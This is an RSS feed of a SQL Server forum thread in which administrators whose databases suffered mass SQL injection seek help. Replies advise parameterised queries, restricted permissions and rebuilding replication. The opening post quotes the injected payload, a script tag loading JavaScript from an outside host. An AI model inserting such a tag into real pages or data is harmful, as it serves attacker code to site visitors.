<?xml version='1.0' encoding='UTF-8'?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/"><channel><title>SQLServerCentral / SQL Server 7,2000 / Replication  / injection attack / Latest Posts</title><generator>InstantForum.NET v2.9.0</generator><description>SQLServerCentral</description><link>http://www.sqlservercentral.com/Forums/</link><webMaster>notifications@sqlservercentral.com</webMaster><lastBuildDate>Tue, 18 Jun 2013 00:41:51 GMT</lastBuildDate><ttl>20</ttl><item><title>RE: injection attack</title><link>http://www.sqlservercentral.com/Forums/Topic527164-7-1.aspx</link><description>Ok, will do BUT ... the main gist of this post was [b]your[/b] mention of the "profiler"? We are trying to determine the vulnerability? </description><pubDate>Fri, 26 Oct 2012 09:48:42 GMT</pubDate><dc:creator>britinusa</dc:creator></item><item><title>RE: injection attack</title><link>http://www.sqlservercentral.com/Forums/Topic527164-7-1.aspx</link><description>New thread in the appropriate forum. Probably SQL 2005 T-SQL. Some people will look at a thread with lots of replies and not check it, assuming it's answered already.</description><pubDate>Fri, 26 Oct 2012 09:43:52 GMT</pubDate><dc:creator>GilaMonster</dc:creator></item><item><title>RE: injection attack</title><link>http://www.sqlservercentral.com/Forums/Topic527164-7-1.aspx</link><description>Sorry .. by all means .. I'm new here ... my bad. A new thread or somewhere you'd prefer? 
Robert</description><pubDate>Fri, 26 Oct 2012 09:38:35 GMT</pubDate><dc:creator>britinusa</dc:creator></item><item><title>RE: injection attack</title><link>http://www.sqlservercentral.com/Forums/Topic527164-7-1.aspx</link><description>Can you post this in a new thread please?</description><pubDate>Fri, 26 Oct 2012 09:32:13 GMT</pubDate><dc:creator>GilaMonster</dc:creator></item><item><title>RE: injection attack</title><link>http://www.sqlservercentral.com/Forums/Topic527164-7-1.aspx</link><description>Wow, this is an old thread but still very pertinent.  We are rapidly migrating to SQL 2005.  But we were attacked by injection ... every varchar field in every table replaced with similar .js crap.  We restored and the world was good. But we're trying to find the vulnerability ... of the publicly visible pages on the site, (only 5 or 6) all are derived with stored procs and / or our own in house brewed trap.  We are told that SQL2005 and SQL2008 handle SQL injections far better.  We are also about to, within a month, implement a proper SQL Server 2005 mirror.  But of course mirrors will merely mirror the injection; right? I'm babbling ... but beyond stored procs and home grown filters, are there any other known hardware software remedies?  You refer to a [b]profiler[/b] to see commands ... where is that? 
</description><pubDate>Fri, 26 Oct 2012 09:26:50 GMT</pubDate><dc:creator>britinusa</dc:creator></item><item><title>RE: injection attack</title><link>http://www.sqlservercentral.com/Forums/Topic527164-7-1.aspx</link><description>The safest fix is probably to completely drop the replication and recreate it.</description><pubDate>Thu, 24 Jul 2008 03:31:40 GMT</pubDate><dc:creator>GilaMonster</dc:creator></item><item><title>RE: injection attack</title><link>http://www.sqlservercentral.com/Forums/Topic527164-7-1.aspx</link><description>Hi. Thank you for your last reply. I resolved that problem by editing all tables and removing that script. I think it was a new injection method. This link was helpful: http://www.msblog.org/index.php?s=yp http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx But I couldn’t resolve a part of problem: There were many Binary fields in MSrepl_commands containing bad script. I deleted them because I couldn’t edit them. I will be pleased to teach “how to edit MSrepl_commands command field and alter its data?” Yours truly, saeed.</description><pubDate>Thu, 24 Jul 2008 03:29:06 GMT</pubDate><dc:creator>saeed_edp</dc:creator></item><item><title>RE: injection attack</title><link>http://www.sqlservercentral.com/Forums/Topic527164-7-1.aspx</link><description>When reading this.  Scroll up to the top of this page in the upper frame you will see [b]Search:[/b] type in the word "injection" (without the quotes)  and then click the button labelled [b]Go[/b].  
And be prepared to read a vast amount of information concerning your problem and some recommended solutions from articles and forums here on SQL ServerCentral</description><pubDate>Thu, 03 Jul 2008 15:59:43 GMT</pubDate><dc:creator>bitbucket-25253</dc:creator></item><item><title>RE: injection attack</title><link>http://www.sqlservercentral.com/Forums/Topic527164-7-1.aspx</link><description>You need to find the application that is vulnerable to injection (you can use profiler to see the commands coming to the database). There isn't a quick silver bullet on this. You need to find the vulnerable pages and fix them. Change SQL statements to parameterised rather than built up. Restrict the app's permissions to not allow it to directly access the tables but to use stored procs. I would suggest that you drop the publication in question and recreate it.</description><pubDate>Wed, 02 Jul 2008 06:01:47 GMT</pubDate><dc:creator>GilaMonster</dc:creator></item><item><title>injection attack</title><link>http://www.sqlservercentral.com/Forums/Topic527164-7-1.aspx</link><description>Please help me! I'm under injection attack and I don't know what I can do. This script ' script src=http://www.hdadwcd.com/b.js /script' is injected into my database (sql server 2000). It was not only injected into many of the databases' fields but also renamed my publication name to:       " [b]publication name[/b] script src=http://www.hdadwcd.com/b.js /script " How can I repair it and stop this injection? How can I edit binary fields in MSrepl_commands and delete this script from the command field?</description><pubDate>Wed, 02 Jul 2008 05:03:28 GMT</pubDate><dc:creator>saeed_edp</dc:creator></item></channel></rss>